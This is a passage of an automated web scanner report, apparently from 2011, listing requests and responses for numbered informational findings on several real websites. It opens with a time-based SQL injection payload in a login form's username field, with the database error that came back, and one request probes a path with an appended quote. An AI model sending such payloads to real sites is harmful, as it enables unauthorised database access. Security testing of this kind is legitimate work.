username=%27;WAITFOR%20DELAY%20%270:0:25%27--&password=3&loginBtn=Login&resetPasswordBtn=Reset+Password

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:31:36 GMT

<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_Authenticate' expects parameter '@password', which was not sup
...[SNIP]...
31.27. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1659&ref2=elqNone&tzo=360&ms=488 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.secureworks.com/compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:24:03 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
31.28. http://tags.bluekai.com/site/2576  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2576

Request

GET /site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=naush555;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bko=KJ0E8VBQrncbQvXuQ0uDJzQxJLM9R1mdp8KHRH/q96BJpDa4EQRqGJQoV10qaXJiRAiWLoQj3GObE0fj9jxNjZ5Qt95ZlKsabsPiD/Vp9/hpszW=; bkst=KJh5Mp2ny69RhZXGYeSNQbBxcaye2dK2mlYyNkQPuG7HMGGUnArQcVGuWz5IQrnAnGGGnG/m/rMQfmJ7zcOhzdVu34CmhdwX7F52gGSK88sqibrUUQt2r4zvioZk9gMNoEns8TAPFLWW4stBPPjCeoCBFITzdIcTmjxB6IsGs/oZrKncuRr/ux0QvKBuW1WW1vWwFY57BILpi5D36S+UYDb6GC0Goa09JOEDVZPwjCwcjb2mm74u1+JCKOnF2DVtHqKw8cgvXt8W/yNj6rImGTlmqIFOLjKmUDv55C9aFDs/QbpReUqAmeLW6XfcXKRGgUGNFnJWKjyoyWHEvoDgx2E6I2qjgxjYcigbNCE+Dfb4elnFripltuiqu9OCOOKR6/HQM/NmRQnvzvwMOsn2d7MFtJra4Ndd9NrqRq1=; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnh19EJPemz9avYen5BWEnqQsylpA3sYIyQ1E+nWJ7Jn0lmyvO3yzeQha7BG1qWy1eYAmXaAo7sd9sGQLzvS9yehexKWO1GX82cJGsHxHBJCQLr/bUm0v9BkiAO0pOYjEC8o8Ly1rQM0EYC0OuYj/9rI1//YGByKTxnFsyH27YMtcwqeZWS1TooqZe2NP9hjelrRJAuaOAtlo38M9p+eQy1SHnPeYkQLHzmWOzXOqG9PKRkAG0OW0xVxYfQjsOpHGHNee9VsUQgsPTyQl0blQ6uNA0Pe9hfAVuRsHRM0Uppxeq+794YB9YWAATJ; bk=bhbvxbkYUciVIHOf; bkc=KJh56gNnxkWROFe7bmNe1N0vy1vQpYvixuyGkthgrsL6BWuT+W5DsBy/AjGvJYaGfrmYeuTBJKg46O9WDA7xWBHuNaE7FUsX2plMMdrX8pf7yyGO6DsOISIStRRDnm71eoiUe55N9Pha9awSChfcJztDPpft92rpyc3tjLowMM2ZraX6c6Npct3Z2jPdjqIaQLY2UVN8R/DfwzA5sKVIMUw4hqE84EeEd8DwrrHImQxv7hUEMNfcf8Gog2yj9OG8KzjthjA7ft8yV8ooUMAHOo3w9GrUgoX6DNfjeQnk1MOtfM3PTbSXzgxqVOGHYc7XaQzp8jPF8nhHO6fmUmKcrYZFFYqf4EzaoL/P6TOyccdZc+RXn+IMNfT+fr9Z2IL35lX4BdPHBrU2dOQYzIcd4rEWOJQogh0xI0XZOzGUN06lR+p6Ug0ZKKPtb5voQmNhP71CbEGQpb2SOcBZMp++zEFlbk7F/zqUol8KDpdkw6Ixtv/=

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:36 GMT
Set-Cookie: bklc=4dc47740; expires=Sun, 08-May-2011 22:33:36 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=hClmGTTKarbVIHOf; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XXgHaWDOdeFBzIwsSmjhDQBMV/1uzG6aeqsprJ+LqYxjZ1FFbJsAkijZAyoSp2KMzPLnJCZJ7IYCPnYoYyDstnawRdgFUmU7d3KzX228fbQe8Mm9sBnPbR9WJuK6M0orUbnK0eWwV1TEFrOunF9IW4jg1VGf5xbZYZFUJaajtc9kv8O0cjK1IVP2pl9bQiyLaStp0mdeU1dSzT1zK2ooFfvllvIiSp9MPUb52LL5fv4m2pB4H7MFG832E+QoFmP5hFk4KGaLr2a6TBZtbISvSdzT9Ur8c8uP+srJtXLz3zNDfN0w9ODfyDZEh6dSvSXLiUlUuQ9wzKmHfKTvSXzSjnFgDF9fdJne10DPfbx2DRameC0FBlOEU7kKE74jNPQ1a96exMqLD4rELt2XMtbUqwYfPFZ4ofMqZlCo7ZDEqZ4n6BQnw9fcp7KOtqf4dZpP2Tdkh9G7JpdI0fvEKdaqSoUgowmcyoRn32opiRzKIUlvIU97BgAE3S8fqtbI+NsKUISpttSEdAcBGw7lx==; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9TaOIhJKnTxTF96BJpDa4JQjPmWrVMTcChrGeFAG1AkYV/WmR/9mee4XIU6Rss0ena1p08GVyZOQuGuhZCi3QMoBn5QOkM5AjswSOVxYgmOZ1; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNv96WDCSz/YsjMYALCVBQrpmI5sqO/Ms+DYsa5ESAT0tyEu/3Tr0vVwAsyLC5aaO+OYNWDLqqhsuhLfs05luoT3X+lpgkpoG/Kj8sqLTr7qQD2rl6sozwOzJxwZdZqxbXmnSsRVu39VNX3Rl0KVmWqE1eUNkCkaKS9tKEghFAdoAI/K7cNhba8hYxs6JHhvRCQ9oMxr2beAIFP3zH0ZKCV0yx7VkWmPa/rxO/v3k7vJ2mJQI1UC6T5VAxbe9dMfj8/NI7sFkyjXvyE6DCeZFxbTtiNd5rTz28p8NN9fPRxO5NIi/16lyGt8EM592wvhFcSSaet37kaiKJhoQ9EESkDgQhHAI2gJp53YcAGfNZE+TfTE+qwF1rilsK+SY/OCOazRW/EQMWtmGAJv1mBMCm/24F2g4BKp4lfICdG+t54; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhM6tJQRmY3jK9YDA/1MdxjsOQjmnAmEs5QI9KV3VETOSHRsHnzWeJq5YW0/eNzeBK1Wev7AsuTs4Ti0UQRQZu3sDT9vDsstbR/ZVN9+C+7Jz1a5oYR7uV/pmuUaZ5QDnPQRceigsjxRtJQRsc/2ynJEswI9aEORyD6CQaisQI/YjE8p0mEy1iQiuEeOjKHDZ5A69qnk/OksvW07npEEHQj2JaAZaOAYAW0xO5XRxuaxqQ2yQPK+QCfracLrVtc1/6jhExlLw833Oi0c7KyE9ZveO+FpPhsC7RcOGR6iV3saneRYyK/Y8TYUR93XhJJhL9JWQLQal90LeAMyMGss/L1FJD1n8COwklFOQkgoAGsCgN/1Ly1i8aAF7AQZlqm9tWS9njCDPQ=; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 07-May-2011 22:33:36 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 239
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://d.xp1.ru4.com/activity?_o=62795&_t=cm_bk&redirect=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2751%3Fid%3d%7euk%7e" width=1 height=1 bor
...[SNIP]...
31.29. http://www.advancedaccess.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedaccess.com
Path:   /

Request

GET / HTTP/1.1
Host: www.advancedaccess.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:47 GMT
Content-Type: text/html
Content-Location: http://www.advancedaccess.com/Index.html
Last-Modified: Fri, 18 Feb 2011 23:37:46 GMT
Accept-Ranges: bytes
ETag: "9446e9d8c4cfcb1:586"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
31.30. http://www.advancedaccess.com/swf/swfobject.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedaccess.com
Path:   /swf/swfobject.js

Request

GET /swf/swfobject.js HTTP/1.1
Host: www.advancedaccess.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=157889130.; __utmxx=157889130.; __utmx_k_251695440=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 18:39:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQCTRCCR=MPAAIBGAIMAIDFIHHJCBFNKP; path=/
Cache-control: private
Content-Length: 19690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Real Estate Website Design, Internet Marketing - Advanced
...[SNIP]...
31.31. http://www.advisorsquare.com/useradmin/Authenticate.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Request

GET /useradmin/Authenticate.asp?GroupId=85732&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2145
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=OOBHGKOBOBCFHHIMIHNKOOLC; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:43 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
31.32. http://www.caribbean-ocean.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /

Request

GET / HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:56:12 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Set-Cookie: PHPSESSID=tnd3bva6krhipm1j4ohktv3s79ifsgn9; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29224

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
31.33. http://www.caribbean-ocean.com/accommodation2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Request

GET /accommodation2.php?id=8289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:34:52 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 19282

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
31.34. http://www.caribbean-ocean.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /index.php

Request

GET /index.php HTTP/1.1
Pragma: no-cache
Host: www.caribbean-ocean.com
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:13 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Set-Cookie: PHPSESSID=qbm7qqtgmut5v5nuuf82f6kcafdj7gll; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 29224

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
31.35. http://www.caribbean-ocean.com/index.php/1'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /index.php/1'

Request

GET /index.php/1' HTTP/1.1
Cookie: PHPSESSID=56e9tj63arfnmfkpi7rsto854a5vfekl
Host: www.caribbean-ocean.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:22 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 29224

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
31.36. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Request

GET /luxury%20Barbados%20Resort%20holidays/91 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:33:04 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16336

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
31.37. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Request

GET /luxury%20Jamaica%20Resort%20holidays/105 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:34:36 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14276

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
31.38. http://www.caribbean-ocean.com/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /styles.css

Request

GET /styles.css HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:32:54 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1526

/*

styles.css

*/

body {
   margin-top:0px;
   margin-bottom:0px;

   /*background-color:rgb(0, 0, 0); testing! */
}

body, div, a:link, a:active, a:visited, .menu-items {
   font-family:Verdana;
   font-siz
...[SNIP]...
31.39. http://www.caribbean-ocean.com/tabs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /tabs.js

Request

GET /tabs.js HTTP/1.1
Host: www.caribbean-ocean.com
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*
Pragma: no-cache
Referer: http://www.caribbean-ocean.com/
Cookie: PHPSESSID=56e9tj63arfnmfkpi7rsto854a5vfekl
Connection: Keep-alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:14 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 910

/*

tabs.js

*/


function switchTabs(tabName)
{
   // set all divs to none -- could clear this up as below
   var divs = document.getElementsByTagName('div');

   for(var i = 0; i < divs.length
...[SNIP]...
31.40. http://www.cloneguard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloneguard.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.cloneguard.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQBRTTDR=PDCHINECNDEAGHCAAPDFDENM; __utmz=150400484.1304749011.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150400484.780713437.1304749011.1304749011.1304749011.1; __utmc=150400484; __utmb=150400484.1.10.1304749011

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 04 Mar 2011 23:33:53 GMT
Accept-Ranges: bytes
ETag: "80c6399fc4dacb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:24:12 GMT
Content-Length: 1142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us">
<head>
<title>
...[SNIP]...
31.41. http://www.compliancepoint.com/sub_serv_isc_pci.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compliancepoint.com
Path:   /sub_serv_isc_pci.asp

Request

GET /sub_serv_isc_pci.asp?gclid=CJu4wszV1KgCFQ075QodRCyFgQ HTTP/1.1
Host: www.compliancepoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:16:34 GMT
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e72934c3e090fe010326c542496bd26f; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.compliancepoint.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 17114
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADDBQTC=NKAKGEBDADCKPECBKIOIPJEM; path=/
Cache-control: private

<html>
<head>
<title>CompliancePoint</title>

<link href="menu.css" type=text/css rel=stylesheet />
<link href="style.css" type=text/css rel=stylesheet />
<script src="main.js"></script>
<scrip
...[SNIP]...
31.42. http://www.eneighborhoods.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Date: Fri, 06 May 2011 18:41:19 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...
31.43. http://www.eneighborhoods.com/menu/homepage/menu.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menu/homepage/menu.css

Request

GET /menu/homepage/menu.css HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Date: Fri, 06 May 2011 18:40:24 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...
31.44. http://www.eneighborhoods.com/menu/menu.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menu/menu.css

Request

GET /menu/menu.css HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
